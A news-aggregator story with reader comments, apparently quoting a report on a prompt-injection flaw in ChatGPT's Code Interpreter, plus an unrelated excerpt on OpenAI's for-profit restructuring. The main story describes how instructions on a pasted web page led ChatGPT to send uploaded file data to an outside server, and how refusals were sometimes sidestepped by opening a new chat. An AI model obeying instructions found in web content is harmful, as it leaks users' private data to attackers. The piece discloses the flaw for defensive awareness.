Arthur T Knackerbracket has processed the following story:
ChatGPT's recently-added Code Interpreter makes writing Python code with AI much more powerful, because it actually writes the code and then runs it for you in a sandboxed environment. Unfortunately, this sandboxed environment, which is also used to handle any spreadsheets you want ChatGPT to analyze and chart, is wide open to prompt injection attacks that exfiltrate your data.
Using a ChatGPT Plus account, which is necessary to get the new features, I was able to reproduce the exploit, which was first reported on Twitter by security researcher Johann Rehberger. It involves pasting a third-party URL into the chat window and then watching as the bot interprets instructions on the web page the same way it would commands the user entered.
[...] I tried this prompt injection exploit and some variations on it several times over a few days. It worked a lot of the time, but not always. In some chat sessions, ChatGPT would refuse to load an external web page at all, but then would do so if I launched a new chat.
In other chat sessions, it would give a message saying that it's not allowed to transmit data from files this way. And in yet other sessions, the injection would work, but rather than transmitting the data directly to http://myserver.com/data.php?mydata=[DATA], it would provide a hyperlink in its response and I would need to click that link for the data to transmit.
I was also able to use the exploit after I'd uploaded a .csv file with important data in it to use for data analysis. So this vulnerability applies not only to code you're testing but also to spreadsheets you might want ChatGPT to use for charting or summarization.
[...] The problem is that, no matter how far-fetched it might seem, this is a security hole that shouldn't be there. ChatGPT should not follow instructions that it finds on a web page, but it does and has for a long time. We reported on ChatGPT prompt injection (via YouTube videos) back in May after Rehberger himself responsibly disclosed the issue to OpenAI in April. The ability to upload files and run code in ChatGPT Plus is new (recently out of beta) but the ability to inject prompts from a URL, video or a PDF is not.
Related Stories
On Wednesday, Reuters reported that OpenAI is working on a plan to restructure its core business into a for-profit benefit corporation, moving away from control by its nonprofit board. The shift marks a dramatic change for the AI company behind ChatGPT, potentially making it more attractive to investors while raising questions about its commitment to sharing the benefits of advanced AI with "all of humanity," as written in its charter.
A for-profit benefit corporation is a legal structure that allows companies to pursue both financial profits and social or environmental goals, ostensibly balancing shareholder interests with a broader mission to benefit society. It's an approach taken by some of OpenAI's competitors, such as Anthropic and Elon Musk's xAI.
[...] Bloomberg reports that OpenAI is discussing giving Altman a 7 percent stake, though the exact details are still under negotiation. This represents a departure from Altman's previous stance of not taking equity in the company, which he had maintained was in line with OpenAI's mission to benefit humanity rather than individuals.
[...] The proposed restructuring also aims to remove the cap on returns for investors, potentially making OpenAI more appealing to venture capitalists and other financial backers. Microsoft, which has invested billions in OpenAI, stands to benefit from this change, as it could see increased returns on its investment if OpenAI's value continues to rise.
(Score: 4, Informative) by ElizabethGreene on Friday November 17 2023, @04:42PM
You should check the Microsoft chat ai options for this problem too. Have a fat bounty program for ai vulnerabilities.
(Score: 5, Funny) by Rosco P. Coltrane on Friday November 17 2023, @04:47PM (2 children)
It randomly clicks on webpages and interprets whatever it finds there at face value, like any dumbass human internet user.
(Score: 2, Insightful) by anubi on Friday November 17 2023, @07:37PM (1 child)
And, like like a human, it's not consistent .
Oh, troubleshooting fun ahead.
"Prove all things; hold fast that which is good." [KJV: I Thessalonians 5:21]
(Score: 2) by maxwell demon on Sunday November 19 2023, @04:03PM
And just as they do with humans, they probably will try to fix it by giving the AI security training.
Which probably will be just as effective as for humans.
The Tao of math: The numbers you can count are not the real numbers.
(Score: 4, Touché) by DadaDoofy on Friday November 17 2023, @06:36PM (1 child)
It's funny how so many people latch on to the "intelligence" part while almost ignoring the "artificial" part. Taken at face value, if the intelligence is artificial, the thing behind this carefully crafted high tech facade is quite likely to be pretty dumb.
(Score: 2) by darkfeline on Friday November 17 2023, @11:04PM
You say that as if humans aren't vulnerable to scams or phishing.
Join the SDF Public Access UNIX System today!